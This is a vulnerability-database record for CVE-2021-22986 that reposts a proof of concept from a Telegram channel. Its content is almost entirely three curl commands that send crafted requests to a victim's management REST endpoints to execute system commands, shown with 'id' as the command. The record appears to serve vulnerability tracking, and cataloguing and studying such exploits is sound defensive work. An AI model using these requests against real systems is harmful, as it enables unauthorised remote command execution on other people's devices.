{"uuid": "17d52eb8-bf81-4934-8880-422bbae48467", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2021-22986", "type": "published-proof-of-concept", "source": "https://t.me/cKure/4430", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 CVE-2021-22986: Execute arbitrary system commands create or delete files disable services.\n\nPoC #1\ncurl -su admin: -H \"Content-Type: application/json\" http://[victimIP]/mgmt/tm/util/bash -d '{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}'\n\nPoC #2\ncurl -ks https://[victimIP]/mgmt/shared/authn/login -d '{\"bigipAuthCookie\":\"\",\"loginReference\":{\"link\":\"http://localhost/mgmt/tm/access/bundle-install-tasks\"},\"filePath\":\"id\"}'\n\nPoC #3\ncurl -ksu admin:[redacted] https://[vimtimIP]/mgmt/tm/access/bundle-install-tasks -d '{\"filePath\":\"id\"}'", "creation_timestamp": "2021-03-20T07:52:22.000000Z"}